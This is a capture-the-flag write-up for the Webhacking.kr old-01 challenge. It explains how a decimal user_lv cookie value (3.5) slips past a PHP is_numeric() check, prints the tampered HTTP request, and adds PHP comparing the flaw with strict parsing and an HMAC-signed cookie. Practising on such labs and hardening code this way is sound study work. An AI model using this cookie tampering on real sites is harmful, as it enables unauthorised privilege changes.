[Webhacking.kr] old-01

by L3m0n S0ju 2021. 8. 25.

Connecting to the challenge server displays the challenge page. Clicking view-source shows the source below.

<?php
  include "../../config.php";
  if($_GET['view-source'] == 1){ view_source(); }
  if(!$_COOKIE['user_lv']){
    SetCookie("user_lv","1",time()+86400*30,"/challenge/web-01/");
    echo("<meta http-equiv=refresh content=0>");
  }
?>
<html>
<head>
<title>Challenge 1</title>
</head>
<body bgcolor=black>
<center>
<br><br><br><br><br>
<font color=white>
---------------------<br>
<?php
  if(!is_numeric($_COOKIE['user_lv'])) $_COOKIE['user_lv']=1;
  if($_COOKIE['user_lv']>=4) $_COOKIE['user_lv']=1;
  if($_COOKIE['user_lv']>3) solve(1);
  echo "<br>level : {$_COOKIE['user_lv']}";
?>
<br>
<a href=./?view-source=1>view-source</a>
</body>
</html>

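In the code, solve(1) runs when the user_lv cookie value is greater than 3 and less than 4. is_numeric() accepts decimal values, so changing only the user_lv value to 3.5 in Burp Suite and sending the request below solves the challenge.
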
GET /challenge/web-01/ HTTP/1.1
Host: webhacking.kr
Cookie: user_lv=3.5; PHPSESSID=rkhr2fcvpf4u1hsodiqvegobql
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="91", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://webhacking.kr/old.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
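
The gap that 3.5 slips through, next to a stricter check, as an added example (not code from the challenge or from the original post). `page_check()` repeats the page's three conditions; `strict_level()`, `issue_level_cookie()` and `read_level_cookie()` are hypothetical hardened replacements, and the key and sample inputs are constructed.

```php
<?php
// Added example, not the challenge's code. Sample inputs and the key are constructed.

// The page's three conditions, applied to a raw cookie string.
function page_check(string $raw): array {
    $lv = $raw;
    if (!is_numeric($lv)) $lv = 1;   // "3.5" and "3.9e0" are numeric strings
    if ($lv >= 4) $lv = 1;           // only values of 4 and above are reset
    return ['level' => $lv, 'solved' => $lv > 3];  // so 3 < x < 4 reaches solve()
}

// Hypothetical hardened parse: whole numbers 1..3 only, anything else falls back to 1.
function strict_level(string $raw): int {
    $lv = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 3]]);
    return $lv === false ? 1 : $lv;
}

// Assumption: in a real deployment the key lives in server-side config.
const DEMO_KEY = 'constructed-demo-key';

// Hypothetical helpers: the cookie carries "level.hmac", so edits are detectable.
function issue_level_cookie(int $lv): string {
    return $lv . '.' . hash_hmac('sha256', (string)$lv, DEMO_KEY);
}

function read_level_cookie(string $cookie): int {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) return 1;
    [$lv, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $lv, DEMO_KEY), $mac)) return 1;
    return strict_level($lv);
}

// Compare both checks over constructed cookie values.
foreach (['1', '3', '3.5', '3.9e0', '4', 'abc'] as $raw) {
    $r = page_check($raw);
    printf("%-6s page: level=%-5s solved=%-3s strict: %d\n",
        $raw, $r['level'], $r['solved'] ? 'yes' : 'no', strict_level($raw));
}

$good = issue_level_cookie(2);
$edited = '3.5' . substr($good, 1);   // level changed, MAC left as issued
printf("signed: %d, edited: %d\n", read_level_cookie($good), read_level_cookie($edited));
```

Keeping the level in server-side session state avoids the problem entirely; the signed cookie is the fallback when the value has to live on the client.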